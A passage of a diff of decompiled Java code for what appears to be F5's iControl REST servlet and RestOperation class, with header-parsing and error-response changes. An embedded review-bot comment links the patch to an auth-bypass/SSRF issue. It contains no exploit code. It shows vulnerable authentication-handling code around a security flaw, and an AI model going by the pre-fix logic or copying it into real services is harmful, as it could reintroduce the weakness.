(HttpServletResponse)context.getResponse());\n context.getResponse().getOutputStream().setWriteListener(new WriteListenerImpl(context, operation));\n } catch (IOException e) {\n context.complete();\n }\n }\n \n \n private class ReadListenerImpl\n implements ReadListener\n {\n private AsyncContext context;\n \n private ServletInputStream inputStream;\n private RestOperation operation;\n private byte[] buffer;\n private ByteArrayOutputStream outputStream;\n \n ReadListenerImpl(AsyncContext context, ServletInputStream inputStream, RestOperation operation) {\n this.context = context;\n this.inputStream = inputStream;\n this.operation = operation;\n this.buffer = null;\n this.outputStream = null;\n }\n \n \n public void onDataAvailable() throws IOException {\n if (this.operation == null) {\n throw new IOException(\"Missing operation\");\n }\n \n if (this.outputStream == null) {\n int contentLength = (int)this.operation.getContentLength();\n if (contentLength == -1) {\n this.outputStream = new ByteArrayOutputStream();\n } else {\n this.outputStream = new ByteArrayOutputStream(contentLength);\n }\n }\n \n \n \n \n \n if (this.buffer == null)\n this.buffer = new byte[RestServerServlet.BUFFER_SIZE];\n int len;\n while (this.inputStream.isReady() && (len = this.inputStream.read(this.buffer)) != -1) {\n this.outputStream.write(this.buffer, 0, len);\n }\n }\n \n \n public void onAllDataRead() throws IOException {\n if (this.outputStream != null) {\n \n if (this.operation.getContentType() == null) {\n this.operation.setIncomingContentType(\"application/json\");\n }\n \n if (RestHelper.contentTypeUsesBinaryBody(this.operation.getContentType())) {\n byte[] binaryBody = this.outputStream.toByteArray();\n this.operation.setBinaryBody(binaryBody, this.operation.getContentType());\n } else {\n String body = this.outputStream.toString(StandardCharsets.UTF_8.name());\n this.operation.setBody(body, this.operation.getContentType());\n }\n }\n \n 
RestOperationIdentifier.setIdentityFromAuthenticationData(this.operation, new Runnable()\n {\n public void run()\n {\n if (!RestServer.trySendInProcess(RestServerServlet.ReadListenerImpl.this.operation)) {\n RestServerServlet.failRequest(RestServerServlet.ReadListenerImpl.this.context, RestServerServlet.ReadListenerImpl.this.operation, (Throwable)new RestWorkerUriNotFoundException(RestServerServlet.ReadListenerImpl.this.operation.getUri().toString()), 404);\n }\n }\n });\n \n \n \n RestServer.trace(this.operation);\n }\n \n \n public void onError(Throwable throwable) {\n if (this.operation != null)\n this.operation.fail(throwable);\n }\n }\n \n private static class WriteListenerImpl\n implements WriteListener\n {\n AsyncContext context;\n RestOperation operation;\n byte[] responseBody;\n ServletOutputStream outputStream;\n \n public WriteListenerImpl(AsyncContext context, RestOperation operation) {\n this.context = context;\n this.responseBody = HttpParserHelper.encodeBody(operation);\n if (this.responseBody != null) {\n context.getResponse().setContentLength(this.responseBody.length);\n }\n \n try {\n this.outputStream = context.getResponse().getOutputStream();\n } catch (IOException e) {\n onError(e);\n }\n }\n \n \n \n public void onWritePossible() throws IOException {\n while (this.outputStream.isReady()) {\n if (this.responseBody != null) {\n this.outputStream.write(this.responseBody);\n this.responseBody = null; continue;\n }\n this.context.complete();\n return;\n }\n }\n \n \n \n public void onError(Throwable throwable) {\n this.operation.fail(throwable);\n }\n }\n \n \n \n \n protected void service(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {\n final AsyncContext context = req.startAsync();\n \n context.start(new Runnable()\n {\n public void run() {\n RestOperation op = null;\n try {\n op = RestServerServlet.this.createRestOperationFromServletRequest((HttpServletRequest)context.getRequest());\n if (op == null) {\n 
HttpServletResponse errResp = (HttpServletResponse)context.getResponse();\n \n errResp.sendError(400, \"Error processing request\");\n \n context.complete();\n return;\n }\n } catch (Exception e) {\n RestServerServlet.this.logger.warning(\"cannot create RestOperation \" + e.getMessage());\n context.complete();\n \n return;\n }\n op.setCompletion(new RestRequestCompletion()\n {\n public void completed(RestOperation operation) {\n RestServerServlet.sendRestOperation(context, operation);\n }\n \n \n public void failed(Exception ex, RestOperation operation) {\n RestServerServlet.failRequest(context, operation, ex, operation.getStatusCode());\n }\n });\n \n try {\n ServletInputStream inputStream = context.getRequest().getInputStream();\n inputStream.setReadListener(new RestServerServlet.ReadListenerImpl(context, inputStream, op));\n } catch (IOException e) {\n RestServerServlet.failRequest(context, op, e, 500);\n }\n }\n });\n }\n \n \n \n public static String getFullURL(HttpServletRequest request) {\n StringBuilder requestURL = new StringBuilder(request.getRequestURI());\n String queryString = request.getQueryString();\n \n if (queryString == null) {\n return requestURL.toString();\n }\n return requestURL.append('?').append(queryString).toString();\n }\n \n \n private static void writeResponseHeadersFromRestOperation(RestOperation operation, HttpServletResponse response) {\n boolean traceHeaders = (RestHelper.getOperationTracingLevel().intValue() <= Level.FINER.intValue());\n \n - if (operation.getOutgoingContentType() == null) {\n + if (operation.getOutgoingContentType() == null || operation.getStatusCode() >= 400)\n + {\n operation.defaultToContentTypeJson();\n }\n \n response.setContentType(operation.getOutgoingContentType());\n \n if (operation.getOutgoingContentEncoding() != null) {\n response.setCharacterEncoding(operation.getOutgoingContentEncoding());\n }\n \n if (operation.getAllow() != null) {\n AddResponseHeader(operation, response, \"Allow\", 
operation.getAllow(), traceHeaders);\n }\n if (operation.getContentRange() != null) {\n AddResponseHeader(operation, response, \"Content-Range\", operation.getContentRange(), traceHeaders);\n }\n \n if (operation.getContentDisposition() != null) {\n AddResponseHeader(operation, response, \"Content-Disposition\", operation.getContentDisposition(), traceHeaders);\n }\n \n if (operation.getWwwAuthenticate() != null) {\n AddResponseHeader(operation, response, \"WWW-Authenticate\", operation.getWwwAuthenticate(), traceHeaders);\n }\n \n if (operation.containsApiStatusInformation()) {\n AddResponseHeader(operation, response, \"X-F5-Api-Status\", HttpParserHelper.formatApiStatusHeader(operation), traceHeaders);\n }\n \n if (operation.getAdditionalHeaders(RestOperation.Direction.RESPONSE) != null) {\n Map<String, String> headers = operation.getAdditionalHeaders(RestOperation.Direction.RESPONSE).getHeaderMap();\n \n for (Map.Entry<String, String> header : headers.entrySet()) {\n AddResponseHeader(operation, response, header.getKey(), header.getValue(), traceHeaders);\n }\n }\n \n response.setStatus(operation.getStatusCode());\n AddResponseHeader(operation, response, \"Pragma\", \"no-cache\", traceHeaders);\n AddResponseHeader(operation, response, \"Cache-Control\", \"no-store\", traceHeaders);\n AddResponseHeader(operation, response, \"Cache-Control\", \"no-cache\", traceHeaders);\n AddResponseHeader(operation, response, \"Cache-Control\", \"must-revalidate\", traceHeaders);\n AddResponseHeader(operation, response, \"Expires\", \"-1\", traceHeaders);\n }\n \n \n private static void AddResponseHeader(RestOperation operation, HttpServletResponse response, String headerName, String headerValue, boolean traceHeaders) {\n response.addHeader(headerName, headerValue);\n }\n \n \n \n \n \n \n \n private static Map<String, HeaderHandler> HEADER_HANDLERS = new HashMap<>();\n static {\n HEADER_HANDLERS.put(\"Accept\".toUpperCase(), new HeaderHandler()\n {\n public void 
processHeaderValue(String headerValue, RestOperation op) {\n op.setAccept(headerValue);\n }\n });\n HEADER_HANDLERS.put(\"Authorization\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op)\n {\n String[] authHeader = headerValue.split(\" \");\n if (authHeader[0].equalsIgnoreCase(\"BASIC\")) {\n op.setBasicAuthorizationHeader(authHeader[1]);\n }\n }\n });\n HEADER_HANDLERS.put(\"Allow\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n op.setAllow(headerValue);\n }\n });\n HEADER_HANDLERS.put(\"Transfer-Encoding\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n op.setTransferEncoding(headerValue);\n }\n });\n HEADER_HANDLERS.put(\"Referer\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n op.setReferer(headerValue);\n }\n });\n HEADER_HANDLERS.put(\"X-F5-REST-Coordination-Id\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n op.setCoordinationId(headerValue);\n }\n });\n HEADER_HANDLERS.put(\"X-Forwarded-For\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n op.setXForwardedFor(headerValue);\n }\n });\n HEADER_HANDLERS.put(\"X-Auth-Token\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n op.setXAuthToken(headerValue);\n }\n });\n HEADER_HANDLERS.put(\"X-F5-Auth-Token\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n op.setXF5AuthToken(headerValue);\n }\n });\n HEADER_HANDLERS.put(\"Connection\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n if (headerValue.equalsIgnoreCase(\"Keep-Alive\")) {\n 
op.setConnectionKeepAlive(true);\n op.setConnectionClose(false);\n } else if (headerValue.equalsIgnoreCase(\"Close\")) {\n op.setConnectionKeepAlive(false);\n op.setConnectionClose(true);\n } else {\n op.setConnectionKeepAlive(false);\n op.setConnectionClose(false);\n }\n }\n });\n HEADER_HANDLERS.put(\"Content-Length\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n op.setContentLength(Integer.parseInt(headerValue));\n }\n });\n HEADER_HANDLERS.put(\"Content-Type\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n op.setIncomingContentType(headerValue);\n }\n });\n HEADER_HANDLERS.put(\"Content-Range\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n op.setContentRange(headerValue);\n }\n });\n HEADER_HANDLERS.put(\"Content-Disposition\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n op.setContentDisposition(headerValue);\n }\n });\n HEADER_HANDLERS.put(\"X-F5-Gossip\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n op.setGossipHeader(headerValue);\n }\n });\n HEADER_HANDLERS.put(\"X-F5-Api-Status\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n HttpParserHelper.formatFromApiStatusHeader(op, headerValue);\n }\n });\n HEADER_HANDLERS.put(\"X-F5-Config-Api-Status\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String bitMaskStr, RestOperation op) {\n try {\n long bitMask = Long.parseLong(bitMaskStr);\n op.setXF5ConfigApiStatus(bitMask);\n }\n catch (NumberFormatException ignored) {}\n }\n });\n HEADER_HANDLERS.put(\"Cookie\".toUpperCase(), new HeaderHandler()\n {\n \n \n public void processHeaderValue(String headerValue, RestOperation op)\n {\n if 
(headerValue.endsWith(\";\")) {\n headerValue = headerValue + \" \";\n }\n if (!headerValue.endsWith(\"; \")) {\n headerValue = headerValue + \"; \";\n }\n HttpParserHelper.parseCookieJarElements(op, headerValue);\n }\n });\n HEADER_HANDLERS.put(\"WWW-Authenticate\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n op.setWwwAuthenticate(headerValue);\n }\n });\n HEADER_HANDLERS.put(\"X-F5-REST-Coordination-Id\".toUpperCase(), new HeaderHandler()\n {\n public void processHeaderValue(String headerValue, RestOperation op) {\n op.setCoordinationId(headerValue);\n }\n });\n }\n \n \n public static void setHostIpAddress(HttpServletRequest request, RestOperation operation) {\n if (request == null || operation == null) {\n return;\n }\n \n if (operation.getAdditionalHeader(\"X-Forwarded-Host\") == null || operation.getAdditionalHeader(\"X-Forwarded-Host\").isEmpty()) {\n \n \n String requestUrl = request.getRequestURL().toString();\n String hostIpAddress = \"localhost\";\n if (requestUrl != null && requestUrl.contains(\"://\")) {\n \n \n requestUrl = requestUrl.split(\"://\")[1];\n hostIpAddress = requestUrl.split(\"/\")[0];\n }\n operation.addAdditionalHeader(\"X-Forwarded-Host\", hostIpAddress);\n }\n }\n \n private RestOperation createRestOperationFromServletRequest(HttpServletRequest request) throws URISyntaxException {\n String port = getInitParameter(\"port\");\n String fullUrl = getFullURL(request);\n \n URI targetUri = new URI(String.format(\"%s%s:%s%s\", new Object[] { \"http://\", \"localhost\", port, fullUrl }));\n \n \n \n \n \n RestOperation op = RestOperation.create().setMethod(RestOperation.RestMethod.valueOf(request.getMethod().toUpperCase())).setUri(targetUri);\n \n \n \n Enumeration<String> headerNames = request.getHeaderNames();\n while (headerNames.hasMoreElements()) {\n String headerName = headerNames.nextElement();\n String headerValue = request.getHeader(headerName);\n if 
(RestOperation.isStandardHeader(headerName)) {\n if (headerValue == null) {\n this.logger.warning(headerName + \" doesn't have value, so skipping\");\n continue;\n }\n HeaderHandler headerHandler = HEADER_HANDLERS.get(headerName.toUpperCase());\n if (headerHandler != null) {\n headerHandler.processHeaderValue(headerValue, op);\n }\n continue;\n }\n op.addAdditionalHeader(headerName, headerValue);\n }\n \n \n \n \n \n \n if (fullUrl.substring(1).startsWith(\"mgmt\")) {\n setHostIpAddress(request, op);\n }\n \n return op;\n }\n \n private static interface HeaderHandler {\n void processHeaderValue(String param1String, RestOperation param1RestOperation);\n }\n }\n diff --git a/com/f5/rest/common/RestOperation.java b/com/f5/rest/common/RestOperation.java\n index ee882d4..fc91fdd 100644\n --- a/com/f5/rest/common/RestOperation.java\n +++ b/com/f5/rest/common/RestOperation.java\n 
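Review bot: the new condition `operation.getStatusCode() >= 400` in `writeResponseHeadersFromRestOperation` hard-codes the threshold even though `RestOperation` already defines `STATUS_FAILURE_THRESHOLD = 400` (visible in the RestOperation.java hunk that follows), and it discards whatever outgoing content type a worker set as soon as the status is an error, so a worker that deliberately returns a non-JSON error body now gets `defaultToContentTypeJson()` instead. Use the constant, and add a one-line comment stating that failure responses are always serialised as JSON on purpose; nothing in this hunk explains why the content-type rule belongs to the same fix as the auth-bypass/SSRF issue the writeup says this patch addresses. Minor: `+ {` on its own line departs from the K&R brace style used throughout the rest of the file.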
@@ -1,2875 +1,2876 @@\n package com.f5.rest.common;\n \n import com.f5.rest.workers.AuthTokenItemState;\n import com.f5.rest.workers.authz.AuthzHelper;\n import com.google.gson.Gson;\n import com.google.gson.GsonBuilder;\n import com.google.gson.JsonElement;\n import com.google.gson.JsonObject;\n import com.google.gson.JsonParser;\n import com.google.gson.JsonSyntaxException;\n import java.io.Reader;\n import java.lang.reflect.Type;\n import java.net.SocketAddress;\n import java.net.URI;\n import java.nio.charset.StandardCharsets;\n import java.security.cert.Certificate;\n import java.util.ArrayList;\n import java.util.Date;\n import java.util.EnumSet;\n import java.util.HashMap;\n import java.util.HashSet;\n +import java.util.Iterator;\n import java.util.List;\n import java.util.Map;\n import java.util.Set;\n import java.util.concurrent.atomic.AtomicInteger;\n import java.util.concurrent.atomic.AtomicLong;\n import java.util.logging.Level;\n import javax.xml.bind.DatatypeConverter;\n import org.joda.time.DateTime;\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n public class RestOperation\n implements Cloneable\n {\n public static class HttpException\n extends Exception\n {\n private static final long serialVersionUID = 1L;\n \n public HttpException(String message) {\n super(message);\n }\n }\n \n private static final RestLogger LOGGER = new RestLogger(RestOperation.class, \"\");\n \n public static final int STATUS_OK = 200;\n \n public static final int STATUS_CREATED = 201;\n \n public static final int STATUS_ACCEPTED = 202;\n \n public static final int STATUS_NO_CONTENT = 204;\n \n public static final int STATUS_PARTIAL_CONTENT = 206;\n \n public static final int STATUS_FOUND = 302;\n \n public static final int STATUS_BAD_REQUEST = 400;\n public static final int STATUS_FAILURE_THRESHOLD = 400;\n public static final int STATUS_UNAUTHORIZED = 401;\n public static final int STATUS_FORBIDDEN = 403;\n public static final int STATUS_NOT_FOUND = 404;\n public static 
final int STATUS_METHOD_NOT_ALLOWED = 405;\n public static final int STATUS_NOT_ACCEPTABLE = 406;\n public static final int STATUS_CONFLICT = 409;\n public static final int STATUS_INTERNAL_SERVER_ERROR = 500;\n public static final int STATUS_NOT_IMPLEMENTED = 501;\n public static final int STATUS_BAD_GATEWAY = 502;\n public static final int STATUS_SERVICE_UNAVAILABLE = 503;\n public static final int STATUS_INSUFFICIENT_STORAGE = 507;\n public static final String REMOTE_SENDER_IN_PROCESS = \"InProcess\";\n public static final String REMOTE_SENDER_UNKNOWN = \"Unknown\";\n public static final String EMPTY_JSON_BODY = \"{}\";\n public static final long UNKNOWN_CONTENT_LENGTH = -1L;\n public static String WILDCARD = \"*\";\n public static String WILDCARD_PATH = \"/\" + WILDCARD;\n \n \n \n private Certificate[] serverCertificateChain;\n \n \n \n \n public static class ParsedCollectionEntry\n {\n public String collectionName;\n \n \n \n public String entryKey;\n }\n \n \n \n \n public enum RestMethod\n {\n GET, POST, PUT, DELETE, PATCH, OPTIONS;\n \n private static final String[] methodHandlerNames = new String[] { \"onGet\", \"onPost\", \"onPut\", \"onDelete\", \"onPatch\", \"onOptions\" };\n static {\n \n }\n \n public String getMethodHandlerName() {\n return methodHandlerNames[ordinal()];\n }\n }\n \n \n \n \n public enum RestOperationFlags\n {\n IDENTIFIED,\n \n VERIFIED;\n }\n \n public static boolean contentTypeEquals(String mediaTypeA, String mediaTypeB) {\n return (mediaTypeA.hashCode() == mediaTypeB.hashCode());\n }\n \n \n \n \n \n public Certificate[] getServerCertificateChain() {\n return this.serverCertificateChain;\n }\n \n RestOperation setServerCertificateChain(Certificate[] certificates) {\n this.serverCertificateChain = certificates;\n return this;\n }\n \n \n protected static final AtomicInteger maxMessageBodySize = new AtomicInteger(33554432);\n \n \n \n protected static final AtomicInteger defaultMessageBodySize = new AtomicInteger(16384);\n \n \n 
(getResourceDeprecated().booleanValue() || getResourceEarlyAccess().booleanValue() || getPropertyDeprecated().booleanValue() || getPropertyEarlyAccess().booleanValue());\n }\n \n \n public void setXF5ConfigApiStatus(long bitMask) {\n this.xF5ConfigApiStatus = bitMask;\n }\n \n public long getXF5ConfigApiStatus() {\n return this.xF5ConfigApiStatus;\n }\n \n public RestOperation setOrigin(String value) {\n this.origin = value;\n return this;\n }\n \n public String getOrigin() {\n return this.origin;\n }\n \n public List<ParsedCollectionEntry> getParsedCollectionEntries() {\n return this.parsedUriCollectionEntries;\n }\n \n \n \n \n \n \n EnumSet<RestOperationFlags> getRestOperationFlags() {\n return this.restOperationFlags;\n }\n \n public void setSourceAddress(SocketAddress sourceAddress) {\n this.sourceAddress = sourceAddress;\n }\n \n public SocketAddress getSourceAddress() {\n return this.sourceAddress;\n }\n \n \n \n \n public boolean isRollbackRequest() {\n return this.isRollbackRequest;\n }\n \n \n \n \n public RestOperation setRollbackRequest(boolean isRollback) {\n this.isRollbackRequest = isRollback;\n return this;\n }\n \n \n \n \n public RestOperation setParsedCollectionEntries(List<ParsedCollectionEntry> parsedList) {\n this.parsedUriCollectionEntries = parsedList;\n return this;\n }\n \n \n \n \n \n \n \n +\n public boolean generateRestErrorResponse() {\n - return ((getContentType() == null || getContentType().contains(\"application/json\")) && isRestErrorResponseRequired());\n + return (getContentType() != null && isRestErrorResponseRequired());\n }\n \n \n \n \n \n \n \n -\n public boolean isRestErrorResponseRequired() {\n return this.isRestErrorResponseRequired;\n }\n \n \n \n \n \n public RestOperation setIsRestErrorResponseRequired(boolean isRestErrorResponseRequired) {\n this.isRestErrorResponseRequired = isRestErrorResponseRequired;\n return this;\n }\n \n \n \n \n public String getIdentifiedGroupName() {\n return this.identifiedGroupName;\n }\n 
\n \n \n \n protected RestOperation setTrustedRequest(boolean value) {\n this.isTrustedRequest = value;\n return this;\n }\n \n \n \n \n \n \n public boolean isTrustedRequest() {\n return this.isTrustedRequest;\n }\n \n \n \n \n \n public RestOperation setSenderNote(String value) {\n this.senderNote = value;\n return this;\n }\n \n public String getSenderNote() {\n return this.senderNote;\n }\n \n \n \n \n public RestOperation setGossipHeader(String value) {\n this.gossipHeader = value;\n return this;\n }\n \n public String getGossipHeader() {\n return this.gossipHeader;\n }\n \n public void complete() {\n if (this.completionCount.incrementAndGet() > 1) {\n if (this.statusCode < 400)\n {\n \n \n LOGGER.fine(RestHelper.throwableStackToString(new IllegalStateException(String.format(\"Already completed:Referer:%s, target:%s\", new Object[] { this.referer, this.uri }))));\n }\n \n \n return;\n }\n \n if (this.completion == null) {\n return;\n }\n \n try {\n if (this.statusCode >= 400) {\n IllegalStateException ise = new IllegalStateException(String.format(\"complete() of %s %s from %s %s called with incompatible status code %s so redirecting to failed()\", new Object[] { getMethod(), getUri(), getReferer(), getRemoteSender(), Integer.valueOf(this.statusCode) }));\n \n \n \n \n this.completion.failed(ise, this);\n LOGGER.warning(RestHelper.throwableStackToString(ise));\n return;\n }\n } catch (Exception e) {\n LOGGER.warningFmt(\"Exception in %s %s failure handler: %s\", new Object[] { getMethod(), getUri(), RestHelper.throwableStackToString(e) });\n \n return;\n }\n \n try {\n this.completion.completed(this);\n } catch (Exception e) {\n try {\n LOGGER.fineFmt(\"Failed attempting to complete a successful %s %s request: %s\", new Object[] { getMethod(), getUri(), RestHelper.throwableStackToString(e) });\n \n Exception ex = RestHelper.convertToException(e);\n this.completion.failed(ex, this);\n } catch (Exception eInsideFail) {\n LOGGER.warningFmt(\"Exception in %s %s 
failed. t: %s tInsideFail: %s\", new Object[] { getMethod(), getUri(), RestHelper.throwableStackToString(e), RestHelper.throwableStackToString(eInsideFail) });\n }\n }\n }\n \n \n \n public void fail(Exception ex, RestErrorResponse err) {\n fail(ex, err, false);\n }\n \n public void fail(Exception ex, RestErrorResponse err, boolean allowExternalStackTrace) {\n try {\n String existingBody = getBodyAsString();\n \n boolean excludeStack = (!allowExternalStackTrace && isRequestExternal());\n \n err.setOriginalRequestBody(existingBody).setCode(this.statusCode).setErrorStack(excludeStack ? null : RestHelper.throwableStackToList(ex)).setReferer(this.referer).setRestOperationId(this.id);\n \n \n \n \n setBody(err);\n } finally {\n fail(ex);\n }\n }\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n public void fail(Throwable throwable) {\n fail(throwable, false);\n }\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n public void fail(Throwable throwable, boolean allowExternalStackTrace) {\n if (this.completionCount.incrementAndGet() > 1) {\n return;\n }\n \n if (this.completion == null) {\n return;\n }\n \n if (throwable == null) {\n throwable = new IllegalArgumentException(\"request failed with null exception\");\n }\n \n Exception ex = null;\n try {\n if (this.statusCode == 200 || this.statusCode == 202) {\n \n this.statusCode = 400;\n if (throwable instanceof RestWorkerUriNotFoundException) {\n this.statusCode = 404;\n }\n }\n \n if (generateRestErrorResponse()) {\n setErrorResponseBody(throwable, allowExternalStackTrace);\n }\n \n JsonElement jsonBody = getParsedBody();\n if (jsonBody != null && jsonBody instanceof JsonObject) {\n JsonObject jsonObject = (JsonObject)jsonBody;\n if (jsonObject != null) {\n Set<Map.Entry<String, JsonElement>> entries = jsonObject.entrySet();\n boolean setDescription = false;\n - for (Map.Entry<String, JsonElement> current : entries) {\n + for (Iterator<Map.Entry<String, JsonElement>> iter = entries.iterator(); iter.hasNext(); ) {\n + 
Map.Entry<String, JsonElement> current = iter.next();\n if (current.getValue() != null && RestWorker.isHtmlTagExists(((JsonElement)current.getValue()).toString())) {\n jsonObject.addProperty(current.getKey(), \"HTML Tag-like Content in the Request URL/Body\");\n setBody(jsonObject.toString());\n LOGGER.fine(\"tag-like content on respone with key \" + (String)current.getKey());\n }\n \n \n - if (((String)current.getKey()).toString().equals(\"code\") && (((JsonElement)current.getValue()).toString().equals(\"400\") || ((JsonElement)current.getValue()).toString().equals(\"500\"))) {\n -\n + if (((String)current.getKey()).toString().equals(\"code\") && Integer.parseInt(((JsonElement)current.getValue()).toString()) >= 400) {\n \n setDescription = true; continue;\n } if (setDescription && ((String)current.getKey()).toString().equals(\"originalRequestBody\")) {\n \n - jsonObject.remove(current.getKey());\n + iter.remove();\n setBody(jsonObject.toString());\n setDescription = false;\n LOGGER.fine(\"Cleared the request content for key \" + (String)current.getKey());\n }\n }\n }\n }\n ex = RestHelper.convertToException(throwable);\n } catch (Exception e2) {\n LOGGER.warningFmt(\"Unable to generate error body for %s %s %s: %s\", new Object[] { getMethod(), getUri(), Integer.valueOf(getStatusCode()), RestHelper.throwableStackToString(e2) });\n } finally {\n \n try {\n this.completion.failed(ex, this);\n } catch (Exception e3) {\n LOGGER.warningFmt(\"failure handler for %s %s %s threw unexpectedly: %s\", new Object[] { getMethod(), getUri(), Integer.valueOf(getStatusCode()), RestHelper.throwableStackToString(e3) });\n }\n }\n }\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n public void setErrorResponseBody(Throwable t) {\n setErrorResponseBody(t, false);\n }\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n public void setErrorResponseBody(Throwable t, boolean allowExternalStackTrace) {\n if (t == null)\n {\n t = new 
IllegalArgumentException(\"Expected exception was null\");\n }\n \n boolean excludeStack = (!allowExternalStackTrace && isRequestExternal());\n \n String existingBody = getBodyAsString();\n if (existingBody == null || existingBody.isEmpty()) {\n \n setBody(RestErrorResponse.create().setCode(this.statusCode).setMessage(t.getLocalizedMessage()).setReferer(this.referer).setRestOperationId(this.id).setErrorStack(excludeStack ? null : RestHelper.throwableStackToList(t)));\n \n \n \n return;\n }\n \n \n \n try {\n boolean isValidErrorResponse = false;\n \n \n Object errorResponse = getBody(RestErrorResponse.class);\n if (errorResponse instanceof RestErrorResponse) {\n RestErrorResponse restErrorResponse = (RestErrorResponse)errorResponse;\n isValidErrorResponse = (restErrorResponse.getCode() != 0L || restErrorResponse.getOriginalRequestBody() != null || restErrorResponse.getMessage() != null);\n }\n \n \n \n \n errorResponse = getBody(RestODataErrorResponse.class);\n if (!isValidErrorResponse && errorResponse instanceof RestODataErrorResponse) {\n RestODataErrorResponse oDataErrorResponse = (RestODataErrorResponse)errorResponse;\n isValidErrorResponse = (oDataErrorResponse.getError() != null && oDataErrorResponse.getError().getCode() != 0);\n }\n \n \n if (excludeStack) {\n existingBody = cleanStackTrace(existingBody);\n setBody(existingBody);\n }\n \n \n if (!isValidErrorResponse) {\n setBody(RestErrorResponse.create().setCode(this.statusCode).setOriginalRequestBody(existingBody).setMessage(t.getLocalizedMessage()).setReferer(this.referer).setRestOperationId(this.id).setErrorStack(excludeStack ? null : RestHelper.throwableStackToList(t)));\n \n \n \n }\n \n \n }\n catch (Exception jsonException) {\n t.addSuppressed(jsonException);\n \n \n setBody(RestErrorResponse.create().setCode(this.statusCode).setMessage(t.getLocalizedMessage()).setOriginalRequestBody(existingBody).setReferer(this.referer).setRestOperationId(this.id).setErrorStack(excludeStack ? 
null : RestHelper.throwableStackToList(t)));\n }\n }\n \n \n \n \n \n \n \n \n \n \n \n \n \n public static String cleanStackTrace(String json) {\n if (json != null && json.contains(\"errorStack\")) {\n json = json.replaceAll(\"(?s)(\\\"errorStack\\\"|errorStack)(\\\\s*):(\\\\s*)\\\\[.*]\", \"$1$2:$3[]\");\n }\n \n \n return json;\n }\n \n private boolean isRequestExternal() {\n boolean isExternal = true;\n \n try {\n isExternal = RestStatic.isExternalRequest(this);\n } catch (Exception e) {\n \n LOGGER.severe(\"Unable to determine if request is external: \" + e.getMessage());\n }\n \n return isExternal;\n }\n \n \n \n \n \n public Object clone() {\n RestOperation copy = new RestOperation();\n copy.completion = this.completion;\n copy.retriesRemaining = this.retriesRemaining;\n copy.parameters.putAll(this.parameters);\n copy.uri = (this.uri == null) ? null : URI.create(this.uri.toString());\n copy.expiration = new Date(this.expiration.getTime());\n copy.method = this.method;\n copy.accept = this.accept;\n copy.allow = this.allow;\n copy.resourceDeprecated = this.resourceDeprecated;\n copy.resourceEarlyAccess = this.resourceEarlyAccess;\n copy.propertyDeprecated = this.propertyDeprecated;\n copy.propertyEarlyAccess = this.propertyEarlyAccess;\n copy.xF5ConfigApiStatus = this.xF5ConfigApiStatus;\n copy.contentType = this.contentType;\n copy.contentDisposition = this.contentDisposition;\n copy.body = this.body;\n copy.binaryBody = this.binaryBody;\n copy.contentLength = this.contentLength;\n copy.contentRange = this.contentRange;\n copy.serverCertificateChain = this.serverCertificateChain;\n copy.isForceSocketEnabled = this.isForceSocketEnabled;\n copy.isRollbackRequest = this.isRollbackRequest;\n copy.restOperationFlags = EnumSet.copyOf(this.restOperationFlags);\n copy.statusCode = this.statusCode;\n if (this.authorizationData != null) {\n copy.authorizationData = new AuthorizationData();\n copy.authorizationData.basicAuthValue = 
this.authorizationData.basicAuthValue;\n copy.authorizationData.xAuthToken = this.authorizationData.xAuthToken;\n copy.authorizationData.xF5AuthTokenState = (this.authorizationData.xF5AuthTokenState == null) ? null : RestHelper.<AuthTokenItemState>copy(this.authorizationData.xF5AuthTokenState);\n \n \n copy.authorizationData.wwwAuthenticate = this.authorizationData.wwwAuthenticate;\n }\n if (this.identityData != null) {\n copy.identityData = new IdentityData();\n copy.identityData.userName = this.identityData.userName;\n if (!RestReference.isNullOrEmpty(this.identityData.userReference)) {\n URI uriCopy = URI.create(this.identityData.userReference.link.toString());\n copy.identityData.userReference = new RestReference(uriCopy);\n }\n if (this.identityData.groupReferences != null) {\n copy.identityData.groupReferences = new RestReference[this.identityData.groupReferences.length];\n \n for (int i = 0; i < this.identityData.groupReferences.length; i++) {\n if (!RestReference.isNullOrEmpty(this.identityData.groupReferences[i])) {\n \n \n URI uriCopy = URI.create((this.identityData.groupReferences[i]).link.toString());\n copy.identityData.groupReferences[i] = new RestReference(uriCopy);\n }\n }\n }\n } copy.transferEncoding = this.transferEncoding;\n copy.sourceAddress = this.sourceAddress;\n copy.referer = this.referer;\n copy.coordinationId = this.coordinationId;\n copy.xForwardedFor = this.xForwardedFor;\n copy.identifiedGroupName = this.identifiedGroupName;\n copy.isTrustedRequest = this.isTrustedRequest;\n \n \n \n copy.isConnectionCloseRequested = this.isConnectionCloseRequested;\n copy.isConnectionKeepAlive = this.isConnectionKeepAlive;\n \n if 